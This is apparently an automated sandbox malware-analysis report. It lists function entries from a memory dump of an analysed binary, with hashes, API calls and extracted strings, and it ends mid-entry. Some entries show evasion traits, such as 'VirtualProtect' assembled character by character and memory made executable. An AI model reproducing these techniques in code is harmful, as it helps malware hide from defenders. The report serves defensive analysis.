Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID:
String ID: I@6H
API String ID: 0-1188634044
Opcode ID: 2d4f9f24aacaf92025cb5df011a3a4628350eab865d05d77a70edf09542be95a
Instruction ID: 5920d79fff2bea0940e57e1bcf8417fa33f96c24497b0643d90e568a438fae86
Opcode Fuzzy Hash: 2d4f9f24aacaf92025cb5df011a3a4628350eab865d05d77a70edf09542be95a
Instruction Fuzzy Hash: 87028BB1D046288FEB24CB14DC90BEABBB5EB44314F1581EAD84DA6341D778AEC1CF95

Function 004070F4 Relevance: 1.8, APIs: 1, Instructions: 250
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,FFFFEBA4,?,?,?,?,?,?,?,?,00406A5A,?), ref: 0040779F

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1873d2e98772a56a1f3f50abdc1a30725eabaefc76c8d9e6bd4245df3509a6a5
Instruction ID: 7044fe5ad64ec624e05532b87b8b60acdd503ca618109fa90a8a530f8245d850
Opcode Fuzzy Hash: 1873d2e98772a56a1f3f50abdc1a30725eabaefc76c8d9e6bd4245df3509a6a5
Instruction Fuzzy Hash: 83B16CB1E096688FEB24CB14CD90AEAB7B5FF95314F1441FAD40D67281D6386E82CF46

Function 0041715A Relevance: 1.7, APIs: 1, Instructions: 188
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417775

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: 9e16f5c70233000f8796cb9847f4fe9ff4f8a1996f646a2b5f2b0288281738fc
Instruction ID: 1476018a360be73aa8c090b949e9f603223c4eaf32c2674842341c04bba03150
Opcode Fuzzy Hash: 9e16f5c70233000f8796cb9847f4fe9ff4f8a1996f646a2b5f2b0288281738fc
Instruction Fuzzy Hash: 119128B5D056298FEB25CB14CC90BEABBB5BB84305F2481EAD40DA7785D6389EC1CF44

Function 00417194 Relevance: 1.7, APIs: 1, Instructions: 173
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efe9d461559758ed977dfa37ac5472bf23fbfded5532083aac7100f3e76e22da
Instruction ID: 1592a4de669d177e619d21ec268e8ac6f2e4ea726e5cb4f96c08e6849bc92a70
Opcode Fuzzy Hash: efe9d461559758ed977dfa37ac5472bf23fbfded5532083aac7100f3e76e22da
Instruction Fuzzy Hash: 97617CB1D142298AEB288B15CC90BFAB775FF44314F1085FAE809A6681E7785EC1CF55

Function 00417392 Relevance: 1.6, APIs: 1, Instructions: 150
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417775

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: 8559aa4969c40f675b4cd1f9f73b98c6e439462239589a78c3a98b9b6be796fb
Instruction ID: 40b7d06c97448d86c1a270aa7c36750fc6de399d16cd6f64c5ffe682ee30b168
Opcode Fuzzy Hash: 8559aa4969c40f675b4cd1f9f73b98c6e439462239589a78c3a98b9b6be796fb
Instruction Fuzzy Hash: D2519CB1D142288AEB28CB24CC91BEAB774FB84310F1085FED809A6785E7785EC5CF45

Function 00417150 Relevance: 1.6, APIs: 1, Instructions: 146
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417775

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: 951c1df2d68f1c750ff19a24e47d2a09d0dc83768a3e2a61ccc96b38049be344
Instruction ID: ca70d50cd5c06a718f5c79da80a6357d70341d19d53b56bd5887671d71e679ad
Opcode Fuzzy Hash: 951c1df2d68f1c750ff19a24e47d2a09d0dc83768a3e2a61ccc96b38049be344
Instruction Fuzzy Hash: 6B519EB1C142298AEB288B24CD51BFAB674FB84310F1085FED809A6745E7785EC5CF45

Function 00416FFE Relevance: 1.6, APIs: 1, Instructions: 125nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417775

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: c3c90d3b250bbcfa4ebb4e780f936f7d109596887f35de6f9dabc3c3fa40a17b
Instruction ID: d7077440ffb973997c2c65a63ae73799d6faea50f7925444badd62112ed53e83
Opcode Fuzzy Hash: c3c90d3b250bbcfa4ebb4e780f936f7d109596887f35de6f9dabc3c3fa40a17b
Instruction Fuzzy Hash: 8D41C7B3D142249FF7248A10DC55BE77B79EB84710F1480BAE80D56781D67C9FC68E92

Function 00407302 Relevance: 1.6, APIs: 1, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,00000040,FFFFEBA4,?,?,?,?,?,?,?,?,00406A5A,?), ref: 0040779F

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c344707cfbab93dcc97d1c11e4f3f2b1d6c2ec5e440ddba98dd8b3829dc6d8af
Instruction ID: c42c5b1f42dffbf49fc5b76768434c5c7e43c850f319e5ac3534525e9833c05b
Opcode Fuzzy Hash: c344707cfbab93dcc97d1c11e4f3f2b1d6c2ec5e440ddba98dd8b3829dc6d8af
Instruction Fuzzy Hash: 0C31E6B2D185145BF7188A11DC5AAF77778EB80310F1481BFD90E672C0DA7D6A828E52

Function 004175F9 Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 105654f194b1627633bd327a17a53a427163800dc8890f4475b953e3d5da5d0b
Instruction ID: 7436e0e746358629e4f8e39342140078f633d27b8fe66c8979fcf4bf99a85519
Opcode Fuzzy Hash: 105654f194b1627633bd327a17a53a427163800dc8890f4475b953e3d5da5d0b
Instruction Fuzzy Hash: A7312671A086694BDB21CA2ACCD0BFF7BB5BF85305F2480EAC54D96612D6389EC18F04

Function 00417344 Relevance: 1.6, APIs: 1, Instructions: 62nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417775

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: 06d5c9794d8d57c481778b69232e8bfb20827cf3ec91a33535f4b85e44c2e031
Instruction ID: 1a9d6a56da613c3e124693ceaa02ee6937be5dd04992d6ccc678fb320fd92598
Opcode Fuzzy Hash: 06d5c9794d8d57c481778b69232e8bfb20827cf3ec91a33535f4b85e44c2e031
Instruction Fuzzy Hash: 4721B4B2D146288FE728CE10DC51BEA7B78EB84710F1444FED80DA6381E2799EC68F41

Function 0041611C Relevance: 1.6, APIs: 1, Instructions: 58nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000001,?), ref: 004161B3

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: 5e41cf81bc49552ec0bd2f866dfcefea69de4807ac8950e51b0aea78a5133b5d
Instruction ID: 8530c9daf85036f2b28dea0e77ba6b3b63cebd812c7b4b0bd49625614f365b20
Opcode Fuzzy Hash: 5e41cf81bc49552ec0bd2f866dfcefea69de4807ac8950e51b0aea78a5133b5d
Instruction Fuzzy Hash: 8F21B771D182595FEB24CB64CCD0BEA7BB0FF01314F1101EAD95DA6281E6789AC1CF56

Function 00416C1C Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON

Download Yara Rule

APIs

NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417775

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: DefaultLocaleQuery
String ID:
API String ID: 2949231068-0
Opcode ID: 7ff223e79ca8f048b1b444e690bc145ba258bca302289f52182bb24b15d065cd
Instruction ID: 6a91514e6bed7dcf4f863cbc0522c8695a9ded1c02f6e32326fea26212f5a16c
Opcode Fuzzy Hash: 7ff223e79ca8f048b1b444e690bc145ba258bca302289f52182bb24b15d065cd
Instruction Fuzzy Hash: 1CE0C272E083588AE730DF229C41BDAB778AF40710F0044AFE00995982E278E6CA8E46

Function 004066DB Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 193
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0041DA1D

Strings

t, xrefs: 0041EFAB
P, xrefs: 0041EFB2
c, xrefs: 0041EFC7
i, xrefs: 0041EFA4
B4GA, xrefs: 0041D98B
E, xrefs: 0041EF96
x, xrefs: 0041EF9D
s, xrefs: 0041EFD5
r, xrefs: 0041EFB9
s, xrefs: 0041EFDC
e, xrefs: 0041EFCE
o, xrefs: 0041EFC0

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: B4GA$E$P$c$e$i$o$r$s$s$t$x
API String ID: 544645111-3409965509
Opcode ID: 045d9014f80a99a546df6506c6ee09ec708b008df3bde6707462fbf6d299fbac
Instruction ID: 7c2c2f91dbc6670ca05046b9be9ead0856f4a96fe15c102968989db437ed7b02
Opcode Fuzzy Hash: 045d9014f80a99a546df6506c6ee09ec708b008df3bde6707462fbf6d299fbac
Instruction Fuzzy Hash: D47105B1D086688BE720CA14CC947FB7BB4EB42305F1481FAC84D66641D63D9EC68F92

Function 0041D991 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 120
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0041DA1D

Strings

t, xrefs: 0041EFAB
P, xrefs: 0041EFB2
c, xrefs: 0041EFC7
i, xrefs: 0041EFA4
E, xrefs: 0041EF96
x, xrefs: 0041EF9D
s, xrefs: 0041EFD5
r, xrefs: 0041EFB9
s, xrefs: 0041EFDC
e, xrefs: 0041EFCE
o, xrefs: 0041EFC0

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: E$P$c$e$i$o$r$s$s$t$x
API String ID: 544645111-3128998556
Opcode ID: db82872b34bc3d4f552e77ac304a2551a86206f802105a463868d0a939822a0a
Instruction ID: 6a63ad6f5d7440d5b6abbd82c09b1e506eb7b05f559da2c88fcd2854066f675e
Opcode Fuzzy Hash: db82872b34bc3d4f552e77ac304a2551a86206f802105a463868d0a939822a0a
Instruction Fuzzy Hash: D741ECB1D086689FFB20C624CC547EA7BF4EB41304F1481EBD88D66681D67D5EC58F51

Function 0041FFB3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 004203A3

Strings

JMCL, xrefs: 00420223
, xrefs: 004203AA

Memory Dump Source

